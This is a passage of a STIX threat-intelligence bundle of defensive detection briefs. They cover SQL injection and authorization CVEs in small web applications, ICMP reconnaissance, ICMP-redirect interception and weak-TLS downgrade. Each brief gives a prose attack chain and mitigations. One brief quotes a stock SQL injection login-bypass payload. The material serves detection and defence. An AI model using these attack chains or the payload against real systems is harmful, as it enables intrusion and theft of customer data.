`save_client` function processes the unsanitized 'Name' argument, directly incorporating the malicious string into a database query.\n5.  The malicious SQL query is then executed by the backend database, granting the attacker unauthorized access to, or manipulation of, the database contents.\n6.  Attacker proceeds to exfiltrate sensitive data, such as user credentials, customer information, or product details, or alters existing data for fraudulent purposes.\n\n## Impact\n\nThe successful exploitation of CVE-2026-14695 can lead to severe consequences for organizations utilizing SourceCodester Multi-Vendor Online Grocery Management System 1.0. Attackers can gain unauthorized access to critical backend databases, potentially compromising sensitive customer data including names, addresses, purchase history, and even authentication credentials. This breach can result in significant financial losses, reputational damage, regulatory penalties (e.g., GDPR, CCPA violations), and disruption of business operations. The public availability of an exploit increases the likelihood of widespread targeting.\n\n## Recommendation\n\n*   **Patch CVE-2026-14695 immediately:** Apply any available patches or vendor-provided updates for SourceCodester Multi-Vendor Online Grocery Management System 1.0 to address the SQL injection vulnerability.\n*   **Implement Web Application Firewall (WAF) rules:** Configure WAFs to detect and block SQL injection attempts, specifically looking for common SQLi patterns in POST requests targeting `classes/Users.php` and the 'Name' argument.\n*   **Conduct code review and input validation:** Perform a thorough security audit of the `save_client` function in `classes/Users.php` and all other input handling components to ensure proper sanitization and parameterized queries are used.\n",
      "published": "2026-07-05T03:17:53Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "cve",
        "sourcecodester",
        "data-theft"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14695"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/lee945/cve/issues/6"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14695"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846835"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376291"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376291/cti"
        },
        {
          "source_name": "reference",
          "url": "https://www.sourcecodester.com/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--28d03a61-6721-5e78-9180-8568afb94860",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote System Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1018",
          "url": "https://attack.mitre.org/techniques/T1018"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bef3dcc6-c406-5697-b06c-8c0ad15d514d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ddebb3c3-153d-55aa-9600-1a5bef621bae",
      "target_ref": "attack-pattern--28d03a61-6721-5e78-9180-8568afb94860"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Active Scanning",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1595",
          "url": "https://attack.mitre.org/techniques/T1595"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35017318-5bae-5c04-a17b-5274119bdfd7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ddebb3c3-153d-55aa-9600-1a5bef621bae",
      "target_ref": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ddebb3c3-153d-55aa-9600-1a5bef621bae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ICMP Timestamp or Information Request from the Internet",
      "description": "## Overview\n\nThis detection brief highlights the observation of inbound ICMP Timestamp (type 13) or Information (type 15) requests originating from external IP addresses and targeting internal RFC1918 IP space. These particular ICMP message types are considered legacy diagnostic messages and are rarely used in modern production networks. Their presence, especially from external sources directed towards internal assets, is a strong indicator of reconnaissance activity. This activity often involves host and path fingerprinting, active scanning, or operating system (OS) fingerprinting as an initial step in an attack chain. While the direct impact of these requests is low, they signify that an attacker is actively probing the network perimeter, seeking vulnerabilities or gathering intelligence for subsequent exploitation. The observed behavior began to be monitored as of June 2026, with the Elastic network_traffic integration being key to detecting these activities.\n\n## Attack Chain\n\nThis brief describes a specific reconnaissance technique rather than a multi-stage attack chain. The detection focuses on the initial probing phase where an attacker attempts to gather information about network topology and host characteristics.\n\n## Impact\n\nWhile ICMP Timestamp or Information requests themselves do not directly compromise systems, their successful execution grants an attacker valuable reconnaissance data. This information can include host existence, network path details, and potentially OS characteristics, which are crucial for tailoring subsequent, more targeted attacks. If these requests are observed targeting unintentionally exposed internal hosts or misconfigured NAT devices, it indicates a significant security misconfiguration that an attacker could leverage. The ultimate impact could range from network mapping and service enumeration to preparing for credential access, privilege escalation, or data exfiltration, depending on the information gathered and the attacker's objectives.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"ICMP Timestamp or Information Request from the Internet\" to your SIEM and tune for your environment to detect suspicious reconnaissance activity.\n*   Review `source.ip` addresses from detections generated by the Sigma rule against threat intelligence feeds and historical scan activity.\n*   Determine whether the `destination.ip` addresses targeted by these requests are intentionally exposed (e.g., VPN concentrators) or if they represent misconfigured internal assets.\n*   Investigate for adjacent port scans, SYN sweeps, or exploit attempts from the same source IP around the time of the detected ICMP requests.\n*   Block or rate-limit the external source IP addresses observed in detections at the perimeter firewall if the activity is unauthorized.\n*   Verify that any targeted internal hosts are not unintentionally exposed to the Internet, rectifying misconfigurations as needed.\n",
      "published": "2026-07-05T02:35:02Z",
      "labels": [
        "network",
        "discovery",
        "reconnaissance",
        "icmp",
        "elastic"
      ],
      "object_refs": [
        "attack-pattern--28d03a61-6721-5e78-9180-8568afb94860",
        "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/discovery_icmp_timestamp_or_information_request_from_the_internet.toml"
        },
        {
          "source_name": "reference",
          "url": "https://www.rfc-editor.org/rfc/rfc792"
        },
        {
          "source_name": "reference",
          "url": "https://nmap.org/book/host-discovery-techniques.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8ba02c07-a742-58de-bdf3-e5678be03bd2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--613720e1-6127-51d4-a7be-907bde062934",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1078",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--04427484-e3d4-5357-9cb0-95756d193553",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--613720e1-6127-51d4-a7be-907bde062934",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--613720e1-6127-51d4-a7be-907bde062934",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14690: Improper Authorization in SourceCodester Multi-Vendor Online Grocery Management System",
      "description": "## Overview\n\nA significant security flaw, tracked as CVE-2026-14690, has been identified in SourceCodester Multi-Vendor Online Grocery Management System version 1.0. This vulnerability specifically resides within the `save_users` function located in the `classes/Users.php` file. The weakness stems from improper authorization controls, allowing an attacker to bypass security checks and manipulate user accounts. Remote exploitation is possible, meaning attackers do not need prior access to the system or user credentials. A public exploit has been made available, increasing the urgency for immediate remediation. For defenders, this vulnerability represents a critical risk of unauthorized access, privilege escalation, and potential compromise of the online grocery management system, including sensitive customer and transactional data.\n\n## Attack Chain\n\n1.  An unauthenticated remote attacker identifies the vulnerable SourceCodester Multi-Vendor Online Grocery Management System 1.0 instance.\n2.  The attacker crafts a malicious HTTP POST request targeting the `/classes/Users.php` endpoint to invoke the `save_users` function.\n3.  Due to the improper authorization flaw, the application fails to adequately verify the attacker's privileges or authentication status for the `save_users` operation.\n4.  The attacker leverages this bypass to create a new administrative user account or modify the roles/privileges of an existing low-privileged user.\n5.  With the newly acquired or elevated administrative credentials, the attacker logs into the system.\n6.  The attacker gains full administrative control over the Multi-Vendor Online Grocery Management System, potentially leading to data exfiltration, system defacement, or further compromise of the underlying server.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14690 would grant unauthorized administrative access to the Multi-Vendor Online Grocery Management System. This direct compromise could lead to severe consequences, including the theft of sensitive customer information (e.g., personal data, order history), financial transaction manipulation, alteration of product inventories, or complete disruption of the online grocery platform. While specific victim counts are not available, any organization utilizing this vulnerable software is at risk of significant reputational damage, financial loss, and regulatory penalties due to data breaches and service interruptions.\n\n## Recommendation\n\n*   Immediately apply any available patches or security updates from SourceCodester for the Multi-Vendor Online Grocery Management System 1.0 to address CVE-2026-14690.\n*   Review access logs for `/classes/Users.php` for any unauthorized or suspicious POST requests that occurred prior to applying the patch for CVE-2026-14690.\n*   Perform an audit of user accounts, especially administrative accounts, for any newly created or modified users since the system's deployment or the disclosure of CVE-2026-14690, investigating any anomalous entries.\n*   Refer to the provided references (https://vuldb.com/cve/CVE-2026-14690, https://github.com/lee945/cve/issues/1) for further details on the vulnerability and potential mitigation strategies.\n",
      "published": "2026-07-05T02:19:33Z",
      "labels": [
        "vulnerability",
        "web-application",
        "improper-authorization",
        "cve",
        "sourcecodester"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14690"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/lee945/cve/issues/1"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14690"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846830"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376286"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376286/cti"
        },
        {
          "source_name": "reference",
          "url": "https://www.sourcecodester.com/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Adversary-in-the-Middle",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1557",
          "url": "https://attack.mitre.org/techniques/T1557"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--baf6b7d4-ca83-5819-9ec2-08ec90cca53d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c375a4c1-e3d5-5167-967d-3785a91a1b69",
      "target_ref": "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c375a4c1-e3d5-5167-967d-3785a91a1b69",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious ICMP Redirect Messages from Internal Hosts Indicating MITM Activity",
      "description": "## Overview\n\nThis threat focuses on the detection of malicious Internet Control Message Protocol (ICMP) Redirect messages (specifically IPv4 type 5 and IPv6 type 137) when sourced from an internal host that is not an authorized network router or gateway. While legitimate ICMP Redirects are typically sent by on-path routers to optimize network paths, a workstation or server emitting such messages is a strong indicator of Adversary-in-the-Middle (MITM) activity. This technique allows attackers to manipulate routing tables on other internal hosts, compelling them to send traffic through a compromised system. The objective is often to intercept sensitive communications, capture credentials, or exfiltrate data. This type of network manipulation is critical for defenders to identify, as it enables further stages of attack by subverting network trust and control.\n\n## Attack Chain\n\n1.  An adversary gains initial access to an internal host within the victim's network (e.g., via a successful phishing campaign or exploitation of a vulnerable service).\n2.  The adversary establishes persistence on the compromised host and prepares it for network manipulation, installing necessary tools or modifying system configurations.\n3.  The compromised host is configured to emit malicious ICMP Redirect messages, specifically Type 5 for IPv4 or Type 137 for IPv6.\n4.  The compromised host sends these ICMP Redirect messages to other target hosts on the same network segment, instructing them to update their routing tables for specific destinations (e.g., DNS servers, authentication servers, internet gateways).\n5.  Target hosts receive and process the malicious ICMP Redirects, modifying their local routing tables to direct traffic for the specified destinations through the compromised adversary-controlled host.\n6.  Traffic intended for legitimate network resources (e.g., Active Directory controllers, web servers, external services) is now rerouted to pass through the adversary's compromised host.\n7.  The adversary performs traffic interception, inspection, and potentially modification on the redirected network traffic.\n8.  The adversary captures sensitive information such as credentials, session tokens, or proprietary data, achieving credential access, data exfiltration, or further attack objectives.\n\n## Impact\n\nA successful Adversary-in-the-Middle attack leveraging ICMP Redirects can have severe consequences, allowing attackers to intercept virtually any network traffic between the affected clients and their intended destinations. This can lead to the theft of sensitive data, including login credentials, intellectual property, and financial information. Attackers can also inject malicious content into intercepted communications, leading to further compromises or the deployment of malware. While no specific victim counts or sectors are named, organizations relying heavily on network segmentation and secure internal communications are particularly at risk, as this technique undermines foundational network trust.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"ICMP Redirect Message from Internal Host\" to your SIEM and tune for your environment, paying close attention to `IcmpType` and `SourceIp` fields.\n*   Investigate alerts from the \"ICMP Redirect Message from Internal Host\" rule by identifying the `source.ip` and verifying if it is an authorized router or gateway.\n*   Review the `IcmpType` (5 or 137) and adjacent flow records for the redirect target and affected destination to understand which routes or resolvers were being manipulated.\n*   Disable ICMP redirect acceptance on client workstations and servers where policy allows to mitigate the effectiveness of T1557.\n*   Ensure `network_traffic.icmp` data streams are being collected from your network environment to enable detection of this activity.\n",
      "published": "2026-07-05T02:03:18Z",
      "labels": [
        "network-security",
        "credential-access",
        "mitm",
        "icmp"
      ],
      "object_refs": [
        "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.rfc-editor.org/rfc/rfc792"
        },
        {
          "source_name": "reference",
          "url": "https://www.rfc-editor.org/rfc/rfc4443"
        },
        {
          "source_name": "reference",
          "url": "https://zimperium.com/blog/doubledirect-zimperium-discovers-full-duplex-icmp-redirect-attacks-in-the-wild"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Adversary-in-the-Middle",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1557",
          "url": "https://attack.mitre.org/techniques/T1557"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b8b18f44-7f9b-50b0-8f88-7467c74127d1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--81158795-c254-576d-9af8-235781f1b52c",
      "target_ref": "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--07538141-dfb0-5ce8-b875-f1a51246a3a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Encrypted Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1573",
          "url": "https://attack.mitre.org/techniques/T1573"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f10f98fe-791c-5197-b34b-330712748b74",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--81158795-c254-576d-9af8-235781f1b52c",
      "target_ref": "attack-pattern--07538141-dfb0-5ce8-b875-f1a51246a3a8"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--81158795-c254-576d-9af8-235781f1b52c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Deprecated TLS Version or Weak Cipher Negotiated Externally",
      "description": "## Overview\n\nThis brief details a detection for successful outbound TLS sessions that use deprecated protocol versions (SSLv3, TLS 1.0, TLS 1.1) or weak cipher suites, including RC4, 3DES, NULL, EXPORT, or anonymous Diffie-Hellman. Threat actors, specifically Adversaries-in-the-Middle (AitM), or legacy malware commonly force these weaker negotiations to facilitate traffic decryption or interception. Modern clients and services should ideally negotiate TLS 1.2 or 1.3 with strong ciphers for all internet-bound connections. The presence of such negotiations from internal hosts to external destinations is a strong indicator of potential compromise, a configured MITM appliance, or communication with outdated and insecure endpoints. This detection is crucial for identifying potential credential access or command and control (C2) activity that relies on exploiting these cryptographic weaknesses.\n\n## Attack Chain\n\n1.  **Initial Compromise / Positioning**: Adversary gains initial access to the internal network (e.g., via phishing, vulnerability exploitation) or positions themselves strategically to conduct a Man-in-the-Middle (MITM) attack on network segments.\n2.  **Network Interception / Malware Deployment**: The attacker either intercepts network traffic directly (MITM) or deploys legacy malware onto an internal host that initiates outbound network connections.\n3.  **TLS Session Initiation**: An internal host attempts to establish an outbound TLS session to an external destination, often for legitimate communication purposes.\n4.  **Forced Downgrade / Weak Cipher Negotiation**: The adversary (in a MITM position) or the legacy malware manipulates the TLS handshake process, forcing the client and/or server to negotiate a deprecated TLS protocol version (SSLv3, TLS 1.0, TLS 1.1) or a weak cipher suite (RC4, 3DES, NULL, EXPORT, anonymous Diffie-Hellman).\n5.  **Successful Weak Negotiation**: The TLS handshake successfully completes, establishing an encrypted channel using the outdated protocol or weak cipher suite, making the traffic susceptible to decryption.\n6.  **Traffic Interception/Decryption**: With the weaker encryption, the adversary can now intercept and decrypt the traffic flowing over the compromised TLS session, gaining access to sensitive data such as credentials or proprietary information.\n7.  **Credential Access / Command and Control**: The decrypted information is leveraged for credential harvesting and lateral movement, or the weak TLS channel is utilized by malware for resilient command and control (C2) communications with attacker infrastructure.\n\n## Impact\n\nSuccessful exploitation or utilization of deprecated TLS versions and weak ciphers by adversaries can lead to significant impact, primarily through the compromise of data confidentiality and integrity. Attackers can intercept and decrypt sensitive information, including user credentials, proprietary business data, and intellectual property, transiting over the network. This can result in unauthorized access to systems and services, data exfiltration, and a loss of trust in communications. While the brief does not specify victim counts, any organization with internal hosts communicating externally via these weak protocols is vulnerable to potential data breach and compromise, particularly within sectors handling sensitive data or operating critical infrastructure.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM to detect deprecated TLS versions and weak cipher negotiations.\n*   Ensure your network traffic logging (`network_traffic.tls` data stream, or equivalent) is configured to capture TLS metadata, including `tls.version`, `tls.version_protocol`, `tls.cipher`, and `tls.established`.\n*   Investigate all alerts generated by the \"Deprecated TLS Version or Weak Cipher Negotiated Externally\" rule, examining `source.ip`, `destination.ip`, `destination.port`, `tls.version`, and `tls.cipher` to differentiate between legitimate legacy systems and malicious activity.\n*   Establish baselines for known legacy internal applications, industrial control systems, or embedded devices that legitimately require deprecated TLS, and create exclusions after validation to reduce false positives.\n*   Implement and enforce TLS 1.2 or higher as the minimum acceptable version on all egress proxies and network gateways, and inspect for MITM appliances that might be forcing weak negotiation.\n*   Block or proxy traffic to external destinations identified as engaging in suspicious weak TLS negotiations if the activity appears attacker-driven.\n*   Patch or replace client and server applications/systems identified as negotiating deprecated TLS versions or weak ciphers to enforce stronger cryptographic standards.\n",
      "published": "2026-07-05T01:52:51Z",
      "labels": [
        "network",
        "tls",
        "credential-access",
        "command-and-control",
        "mitm",
        "downgrade",
        "weak-cipher"
      ],
      "object_refs": [
        "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05",
        "attack-pattern--07538141-dfb0-5ce8-b875-f1a51246a3a8"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1557/"
        },
        {
          "source_name": "reference",
          "url": "https://www.elastic.co/docs/reference/integrations/network_traffic"
        },
        {
          "source_name": "reference",
          "url": "https://www.elastic.co/docs/reference/ecs/ecs-tls"
        },
        {
          "source_name": "reference",
          "url": "https://www.rfc-editor.org/rfc/rfc9325.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--31893b16-e1b1-5f2b-8f5c-da290a539219",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/geminipolo1991-vampire/CVE---Web/issues/1",
      "pattern": "[url:value = 'https://github.com/geminipolo1991-vampire/CVE---Web/issues/1']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T01:27:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9ea0b5f3-59e2-5d18-bc8c-acf62791bdcf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4d6c1c35-b666-5502-a5d3-04fd925920d2",
      "target_ref": "indicator--31893b16-e1b1-5f2b-8f5c-da290a539219"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d84ec475-e879-545e-b317-a80df35e471e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14688",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14688']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T01:27:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d48ad08b-f52e-5ccd-87b6-338773b10fa3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4d6c1c35-b666-5502-a5d3-04fd925920d2",
      "target_ref": "indicator--d84ec475-e879-545e-b317-a80df35e471e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--91e05007-2622-5585-ac89-c91570ffc39e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376284",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376284']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T01:27:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8fa52e4b-c0a1-5954-9c76-bfb81517a4c2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4d6c1c35-b666-5502-a5d3-04fd925920d2",
      "target_ref": "indicator--91e05007-2622-5585-ac89-c91570ffc39e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--73694ac6-acd9-5e0c-be2b-0882cd17bf88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4d6c1c35-b666-5502-a5d3-04fd925920d2",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4d6c1c35-b666-5502-a5d3-04fd925920d2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14688: Remote SQL Injection in itsourcecode Online Hotel Management System",
      "description": "## Overview\n\nA critical SQL injection vulnerability (CVE-2026-14688) has been discovered in itsourcecode Online Hotel Management System version 1.0. The flaw is located in the `/admin/login.php` file, specifically when processing the `email` argument during the login process. An unauthenticated, remote attacker can manipulate this argument to inject malicious SQL queries, leading to unauthorized access to the system's administrative panel, data exfiltration, or potentially further compromise. The exploit for this vulnerability is publicly available, increasing the urgency for immediate remediation. Given the ease of exploitation and the potential for complete system compromise, organizations using this software must apply patches or implement mitigation strategies promptly to prevent data breaches and service disruption.\n\n## Attack Chain\n\n1.  An unauthenticated remote attacker initiates an HTTP POST request targeting the `/admin/login.php` endpoint of the vulnerable itsourcecode Online Hotel Management System.\n2.  The attacker crafts the request to include a malicious SQL injection payload within the `email` argument, such as `' OR '1'='1` or similar database manipulation commands.\n3.  The vulnerable application processes the `email` argument without proper sanitization or parameterization, directly embedding the attacker's payload into a backend SQL query.\n4.  The injected SQL query executes on the database server, allowing the attacker to bypass authentication logic, potentially dump database contents (e.g., user credentials, sensitive customer data), or determine database schema.\n5.  Upon successful authentication bypass, the attacker gains unauthorized administrative access to the Online Hotel Management System's backend interface.\n6.  With administrative privileges, the attacker can then exfiltrate sensitive data, modify system configurations, inject malicious web content (e.g., defacement, phishing pages), or potentially achieve remote code execution if the application supports file upload or command execution features via the admin panel.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14688 grants unauthenticated remote attackers full administrative control over the Online Hotel Management System. This can lead to severe consequences, including the theft of sensitive customer and business data (such as booking details, personal identifiable information, and payment information), unauthorized modification of system settings, disruption of hotel operations, and financial losses due to fraud or reputational damage. Given the public availability of the exploit, any internet-facing installations of itsourcecode Online Hotel Management System 1.0 are at immediate risk, potentially affecting countless organizations if not patched swiftly.\n\n## Recommendation\n\n*   Immediately update itsourcecode Online Hotel Management System to a patched version once released by the vendor to address CVE-2026-14688.\n*   Deploy the Sigma rule `CVE-2026-14688: SQL Injection Attempt in /admin/login.php` to your SIEM solution to detect attempts to exploit this vulnerability.\n*   Implement a Web Application Firewall (WAF) in front of the application to filter and block malicious HTTP requests containing SQL injection payloads.\n*   Monitor web server access logs for suspicious requests to `/admin/login.php` that contain unusual characters or SQL keywords in the `email` parameter, as outlined in the detection rule.\n*   Review network egress logs for connections to unusual destinations from the affected web server, which could indicate data exfiltration post-exploitation.\n",
      "published": "2026-07-05T01:27:57Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "cve",
        "remote-code-execution",
        "data-exfiltration",
        "webserver"
      ],
      "object_refs": [
        "indicator--31893b16-e1b1-5f2b-8f5c-da290a539219",
        "indicator--d84ec475-e879-545e-b317-a80df35e471e",
        "indicator--91e05007-2622-5585-ac89-c91570ffc39e",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/geminipolo1991-vampire/CVE---Web/issues/1"
        },
        {
          "source_name": "reference",
          "url": "https://itsourcecode.com/"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14688"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846809"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376284"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376284/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Network Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1498",
          "url": "https://attack.mitre.org/techniques/T1498"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3bba18b7-67f2-5761-bea2-a6ccc0442906",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4fcf550e-2e6e-51c6-8ae8-ad62b3b569ba",
      "target_ref": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4fcf550e-2e6e-51c6-8ae8-ad62b3b569ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential DHCP Starvation via High Client MAC Cardinality",
